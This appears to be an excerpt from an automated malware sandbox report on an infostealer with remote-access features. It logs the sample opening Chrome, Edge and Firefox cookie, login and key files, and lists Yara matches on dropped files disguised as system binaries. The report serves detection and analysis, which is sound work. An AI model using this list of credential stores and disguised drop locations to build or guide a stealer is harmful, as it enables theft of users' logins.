Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

Remote Access Functionality

Source: Yara match File source: 00000004.00000002.1932393224.0000000013164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: driverInto.exe PID: 5936, type: MEMORYSTR
Source: Yara match File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000000.1783939727.0000000000AC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1622104471.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Registration\csrss.exe, type: DROPPED
Source: Yara match File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Registration\csrss.exe, type: DROPPED